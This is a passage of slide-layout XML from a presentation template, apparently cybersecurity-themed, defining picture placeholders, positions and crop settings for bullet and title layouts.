            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432306" y="3916573"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="528" name="Google Shape;528;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3082261"/>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29. Bullets 1–4 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 529"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530" name="Google Shape;530;p30"/>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2" name="Google Shape;532;p3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33" name="Google Shape;533;p3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34" name="Google Shape;534;p3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35" name="Google Shape;535;p3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36" name="Google Shape;536;p3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7" name="Google Shape;537;p30"/>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8" name="Google Shape;538;p30"/>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0"/>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0"/>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30"/>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42" name="Google Shape;542;p30"/>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43" name="Google Shape;543;p30"/>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44" name="Google Shape;544;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1402811"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="545" name="Google Shape;545;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="546" name="Google Shape;546;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3056198"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="547" name="Google Shape;547;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432306" y="3916573"/>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3. Title Slide: Cybersecurity ">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 27"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Google Shape;28;p4"/>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29" name="Google Shape;29;p4"/>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4"/>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Cybersecurity</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Google Shape;31;p4"/>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32" name="Google Shape;32;p4"/>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3" name="Google Shape;33;p4"/>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 name="Google Shape;34;p4"/>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35" name="Google Shape;35;p4"/>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36" name="Google Shape;36;p4"/>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30. Bullets 1–4 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 548"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549" name="Google Shape;549;p31"/>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1" name="Google Shape;551;p3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52" name="Google Shape;552;p3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53" name="Google Shape;553;p3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54" name="Google Shape;554;p3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55" name="Google Shape;555;p3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6" name="Google Shape;556;p31"/>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7" name="Google Shape;557;p31"/>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1"/>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1"/>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1"/>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61" name="Google Shape;561;p31"/>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62" name="Google Shape;562;p31"/>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63" name="Google Shape;563;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1402811"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="564" name="Google Shape;564;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2227098"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="565" name="Google Shape;565;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3056198"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="566" name="Google Shape;566;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="432306" y="3916573"/>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31. Bullets 1–5 (Green)">
  <p:cSld name="CUSTOM_2_7_1_4_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 567"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568" name="Google Shape;568;p32"/>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0" name="Google Shape;570;p3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71" name="Google Shape;571;p3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72" name="Google Shape;572;p3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73" name="Google Shape;573;p3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74" name="Google Shape;574;p3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5" name="Google Shape;575;p32"/>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6" name="Google Shape;576;p32"/>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2"/>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2"/>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2"/>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80" name="Google Shape;580;p32"/>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81" name="Google Shape;581;p32"/>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82" name="Google Shape;582;p32"/>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32"/>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84" name="Google Shape;584;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1314036"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="585" name="Google Shape;585;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="586" name="Google Shape;586;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2701248"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="587" name="Google Shape;587;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="588" name="Google Shape;588;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>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32. Bullets 1–5 (Green/Yellow)">
  <p:cSld name="CUSTOM_2_7_1_4_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 589"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="590" name="Google Shape;590;p33"/>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2" name="Google Shape;592;p3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93" name="Google Shape;593;p3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94" name="Google Shape;594;p3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95" name="Google Shape;595;p3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96" name="Google Shape;596;p3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7" name="Google Shape;597;p33"/>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8" name="Google Shape;598;p33"/>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33"/>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33"/>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3"/>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2" name="Google Shape;602;p33"/>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3" name="Google Shape;603;p33"/>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4" name="Google Shape;604;p33"/>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33"/>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06" name="Google Shape;606;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1314036"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="607" name="Google Shape;607;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="608" name="Google Shape;608;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2701248"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="609" name="Google Shape;609;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="610" name="Google Shape;610;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>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33. Bullets 1–5 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_4_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 611"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="612" name="Google Shape;612;p34"/>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3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4" name="Google Shape;614;p3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15" name="Google Shape;615;p3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16" name="Google Shape;616;p3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17" name="Google Shape;617;p3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18" name="Google Shape;618;p3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9" name="Google Shape;619;p34"/>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0" name="Google Shape;620;p34"/>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34"/>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34"/>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34"/>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4" name="Google Shape;624;p34"/>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5" name="Google Shape;625;p34"/>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6" name="Google Shape;626;p34"/>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34"/>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28" name="Google Shape;628;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1314036"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="629" name="Google Shape;629;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="630" name="Google Shape;630;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2701248"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="631" name="Google Shape;631;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="632" name="Google Shape;632;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1774" b="1765"/>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34. Bullets 1–5 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_4_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 633"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="634" name="Google Shape;634;p35"/>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3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36" name="Google Shape;636;p3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37" name="Google Shape;637;p3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38" name="Google Shape;638;p3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39" name="Google Shape;639;p3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40" name="Google Shape;640;p3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1" name="Google Shape;641;p35"/>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2" name="Google Shape;642;p35"/>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35"/>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35"/>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5"/>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6" name="Google Shape;646;p35"/>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7" name="Google Shape;647;p35"/>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8" name="Google Shape;648;p35"/>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35"/>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50" name="Google Shape;650;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1314036"/>
            <a:ext cx="785567" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="651" name="Google Shape;651;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2010348"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="652" name="Google Shape;652;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2701248"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="653" name="Google Shape;653;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3392773"/>
            <a:ext cx="785566" cy="606900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="654" name="Google Shape;654;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="465"/>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35. Bullets 1–6 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_3_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 655"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="656" name="Google Shape;656;p36"/>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3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8" name="Google Shape;658;p3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59" name="Google Shape;659;p3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60" name="Google Shape;660;p3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61" name="Google Shape;661;p3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62" name="Google Shape;662;p3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63" name="Google Shape;663;p36"/>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64" name="Google Shape;664;p36"/>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36"/>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36"/>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36"/>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36"/>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36"/>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70" name="Google Shape;670;p36"/>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71" name="Google Shape;671;p36"/>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72" name="Google Shape;672;p36"/>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73" name="Google Shape;673;p36"/>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74" name="Google Shape;674;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1261872"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="675" name="Google Shape;675;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1848847"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="676" name="Google Shape;676;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="2439922"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="677" name="Google Shape;677;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="228" b="238"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3040985"/>
            <a:ext cx="577805" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="678" name="Google Shape;678;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1830" b="1830"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="3622122"/>
            <a:ext cx="577804" cy="446400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
